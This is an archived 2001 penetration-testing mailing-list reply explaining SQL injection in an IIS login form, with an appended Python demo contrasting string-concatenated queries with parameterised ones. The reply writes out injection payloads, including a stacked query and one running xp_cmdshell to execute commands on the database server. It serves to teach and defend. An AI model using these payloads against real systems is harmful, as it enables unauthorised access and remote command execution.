RE: SQL

From: Javier Fernández-Sanguino (jfernandez@germinus.com)
Date: 11/20/01


Subject: RE: SQL
Date: Tue, 20 Nov 2001 09:41:39 +0100
Message-ID: <D862800CA540B6488E6D55B3677A0E8E1B6323@mailserver>
From: Javier Fernández-Sanguino <jfernandez@germinus.com>
To: <garyo@sec-1.com>, <PEN-TEST@securityfocus.com>


You might (90% chance) have a possibility to

a) alter the database
b) execute remote commands in the SQL server

This is a common error (not quoting quotes :). It is due to the SQL
statement being executed in the IIS server (through an ODBC connection)
simply having the information given by the user appended to it.

Thus:

SELECT * from test where value='$user'

if user=' becomes:

SELECT * from test where value='''

which generates your error.

However, you can do the following:
if user=test'; select * from test -- becomes:

SELECT * from test where value='test'; select * from test -- '

which is a valid SQL statement (two as a matter of fact) and
if user=test'; exec master..xp_cmdshell 'dir' -- becomes:

SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' --

which will run the 'dir' command in the SQL server (not in the IIS!).
This is fun since, in some cases, the IIS server is in a DMZ and the SQL
server is in the internal LAN or through another firewall, like this:

Internet ----- Fw -------- Fw --------- Local network
                |           |
               IIS      SQL server

or

Internet ----- Fw -------- Local network
                |           |
               IIS      SQL server

So you might be one step closer to your target !

Some references (fresh out from google):
http://www.sqlsecurity.com/faq-inj.asp
http://www.silksoft.co.za/data/sqlinjectionattack.htm

        Regards

        Javier Fernández-Sanguino Peña

>
> Hello all,
>
> I am doing a pen test against an IIS 5 web server. The web server requires a
> user name and password via a logon form. If a single quote character is
> entered (username) the following error is produced
>
> [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
> before the character string '' and password=''.
>
> I remember reading somewhere that this can be used to gain further access,
> but I can't find the info.
>
> Can anyone help?
>
> Thanks in advance.
>
> Gary
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
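The mechanism Javier describes above (the form value being pasted into the SQL text, so a stray quote breaks the statement) next to the fix a developer would apply (a parameterised query). This is an added example for this archive page, not code from the thread or from the application Gary was testing. It assumes a two-column "test" table, uses an in-memory SQLite database in place of SQL Server, and notes one caveat: Python's sqlite3 driver refuses to run a second statement in one call, so the "test'; select ..." input shows up here as a refused query rather than the stacked-query execution the thread describes for SQL Server. The safe lookup treats every one of these inputs as a plain value and returns no rows.

```python
import sqlite3

# Constructed stand-in for the thread's "test" table; the real schema behind
# the logon form is not shown in the thread, so these columns are an assumption.
SAMPLE_ROWS = [("test", "s3cret"), ("alice", "hunter2")]


def make_db():
    """In-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (value TEXT, password TEXT)")
    conn.executemany("INSERT INTO test VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def vulnerable_lookup(conn, user):
    """The pattern the thread describes: the user's string is pasted straight
    into the SQL text, so quotes in the input become part of the statement."""
    sql = "SELECT * FROM test WHERE value='" + user + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user):
    """Parameterised query: the SQL text is fixed and the value travels as a
    bound parameter, so a quote in the input is only a character to compare."""
    return conn.execute("SELECT * FROM test WHERE value=?", (user,)).fetchall()


def probe(conn, user):
    """Run both lookups on one input and report ('ok', rows) or ('error', msg)
    for each, so the two behaviours can be compared side by side."""
    results = {}
    for name, fn in (("vulnerable", vulnerable_lookup), ("safe", safe_lookup)):
        try:
            results[name] = ("ok", fn(conn, user))
        except (sqlite3.Error, sqlite3.Warning) as exc:
            # Unterminated quote (the "unclosed quotation mark" symptom) or the
            # driver refusing a second statement in the same call.
            results[name] = ("error", str(exc))
    return results


if __name__ == "__main__":
    db = make_db()
    # The three inputs from the thread: a legitimate name, a lone quote, and a
    # quote followed by a second statement and a comment marker.
    for user in ("test", "'", "test'; select * from test --"):
        print(repr(user), probe(db, user))
```

The same comparison holds for any driver: concatenated SQL makes the database parse user data as code, while a bound parameter never reaches the parser as SQL. The error message Gary saw is the vulnerable path's symptom, and its absence on the safe path is the easiest regression check to keep in a test suite.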


